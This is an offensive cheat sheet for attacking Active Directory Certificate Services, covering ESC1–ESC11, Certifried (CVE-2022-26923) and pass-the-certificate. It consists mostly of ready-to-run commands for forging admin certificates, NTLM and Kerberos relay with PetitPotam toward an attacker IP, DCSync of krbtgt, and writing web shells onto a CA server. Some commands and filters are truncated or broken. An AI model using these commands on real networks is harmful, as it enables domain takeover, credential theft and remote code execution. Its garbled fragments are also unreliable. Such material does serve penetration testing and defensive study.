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# Active Directory - Certificate Services
* Find ADCS Server
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`
## ESC1 - Misconfigured Certificate Templates
> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.
* Template that allows for AD authentication
* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage)
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
Certify.exe find /vulnerable
Certify.exe find /vulnerable /currentuser
# or
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage= (pkiextendedkeyusage=' -SearchBase 'CN=Configuration,DC=lab,DC=local'
# or
certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
* Use OpenSSL and convert the certificate, do not enter a password
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus
Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
**WARNING**: These certificates will still be usable even if the user or computer resets their password!
## ESC2 - Misconfigured Certificate Templates
* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (
* Find template
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
## ESC3 - Misconfigured Enrollment Agent Templates
> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
* Request a certificate based on the vulnerable certificate template ESC3.
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
[*] Saved certificate and private key to 'john.pfx'
* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
## ESC4 - Access Control Vulnerabilities
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip -get-acl
* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
# Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template.
C:\>StandIn.exe --adcs --filter WebServer --ess --add
* Perform ESC1 and then restore the value
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip -value 0 -property mspki-Certificate-Name-Flag
Using Certipy
# overwrite the configuration to make it vulnerable to ESC1
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
# request a certificate based on the ESC4 template, just like ESC1.
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local'
# restore the old configuration
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.
Certify.exe cas
* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names
.\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
* Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
## ESC7 - Vulnerable Certificate Authority Access Control
* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions
Certify.exe find /vulnerable
* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)
Certify.exe setconfig /enablesan /restart
* Request the certificate with the desired SAN.
Certify.exe request /template:User /altname:super.adm
* Grant approval if required or disable the approval requirement
# Grant
Certify.exe issue /id:[REQUEST ID]
# Disable
Certify.exe setconfig /removeapproval /restart
Alternative exploitation from **ManageCA** to **RCE** on ADCS server:
# Get the current CDP list. Useful to find remote writable shares:
Certify.exe writefile /ca:SERVER\ca-name /readonly
# Write an aspx shell to a local web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
# Write the default asp shell to a local web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
# Write a php shell to a remote web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
## ESC8 - AD CS Relay Attack
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
* **Version 1**: NTLM Relay + Rubeus + PetitPotam
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
impacket> python3 ./examples/ntlmrelayx.py -t -smb2support --adcs --template VulnTemplate
# For a member server or workstation, the template would be "Computer".
# Other templates: workstation, DomainController, Machine, KerberosAuthentication
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
git clone https://github.com/topotam/PetitPotam
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
python3 dementor.py <listener> <target> -u <username> -p <password> -d <domain>
python3 dementor.py -u user1 -p Password1 -d lab.local
# Use the certificate with rubeus to request a TGT
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
# Now you can use the TGT to perform a DCSync
mimikatz> lsadump::dcsync /user:krbtgt
* **Version 2**: NTLM Relay + Mimikatz + Kekeo
impacket> python3 ./examples/ntlmrelayx.py -t -smb2support --adcs --template DomainController
# Mimikatz
mimikatz> misc::efs /server:dc.lab.local /connect:<IP> /noauth
# Kekeo
kekeo> base64 /input:on
kekeo> tgt::ask /pfx:<BASE64-CERT-FROM-NTLMRELAY> /user:dc$ /domain:lab.local /ptt
# Mimikatz
mimikatz> lsadump::dcsync /user:krbtgt
* **Version 3**: Kerberos Relay
# Setup the relay
sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
# Run mitm6
sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
# ADCSPwn arguments
adcs - This is the address of the AD CS server which authentication will be relayed to.
secure - Use HTTPS with the certificate service.
port - The port ADCSPwn will listen on.
remote - Remote machine to trigger authentication from.
username - Username for non-domain context.
password - Password for non-domain context.
dc - Domain controller to query for Certificate Templates (LDAP).
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output - Output path to store base64 generated crt.
* **Version 5**: Certipy ESC8
certipy relay -ca
## ESC9 - No Security Extension
* `StrongCertificateBindingEnforcement` set to `1` (default) or `0`
* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value
* Certificate specifies `Any Client` authentication EKU
* `GenericWrite` over any account A to compromise any account B
John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local.
Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.
* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
certipy shadow auto -username John@corp.local -p Passw0rd -account Jane
* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator
* Request the vulnerable certificate template ESC9 from Jane's account.
certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
# userPrincipalName in the certificate is Administrator
# the issued certificate contains no "object SID"
* Restore userPrincipalName of Jane to Jane@corp.local.
certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local
* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user.
certipy auth -pfx administrator.pfx -domain corp.local
# Add -domain <domain> to your command line since there is no domain specified in the certificate.
## ESC11 - Relaying NTLM to ICPR
> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork
* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork
1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip -stdout` output
2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.
ntlmrelayx.py -t rpc:// -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
## Certifried CVE-2022-26923
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
* Find `ms-DS-MachineAccountQuota`
python bloodyAD.py -d lab.local -u username -p 'Password123*' --host getObjectAttributes 'DC=lab,DC=local' ms-DS-MachineAccountQuota
* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10`
python bloodyAD.py -d lab.local -u username -p 'Password123*' --host addComputer cve 'CVEPassword1234*'
certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local'
* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN
Rubeus.exe tgtdeleg
export KRB5CCNAME=/tmp/ws02.ccache
python bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local setAttribute 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName '[]'
* Set the `dNSHostName` attribute to match the Domain Controller hostname
python bloodyAD.py -d lab.local -u username -p 'Password123*' --host setAttribute 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName '["DC.lab.local"]'
python bloodyAD.py -d lab.local -u username -p 'Password123*' --host getObjectAttributes 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName
* Request a ticket
# certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA
certipy req 'lab.local/cve$:CVEPassword1234*@' -template Machine -dc-ip -ca lab-ADCS-CA
* Either use the pfx or set a RBCD on your machine account to takeover the domain
certipy auth -pfx ./dc.pfx -dc-ip
openssl pkcs12 -in dc.pfx -out dc.pem -nodes
python bloodyAD.py -d lab.local -c ":dc.pem" -u 'cve$' --host setRbcd 'CVE$' 'CRASHDC$'
getST.py -spn LDAP/CRASHDC.lab.local -impersonate Administrator -dc-ip 'lab.local/cve$:CVEPassword1234*'
secretsdump.py -user-status -just-dc-ntlm -just-dc-user krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip -target-ip
## Pass-The-Certificate
> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"
* Windows
# Information about a cert file
certutil -v -dump admin.pfx
# From a Base64 PFX
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
# Grant DCSync rights to an user
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid <user_SID>
# To restore
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
* Linux
# Base64-encoded PFX certificate (string) (password can be set)
gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
# PEM certificate (file) + PEM private key (file)
# PFX certificate (file) + password (string, optionnal)
# Using Certipy
certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"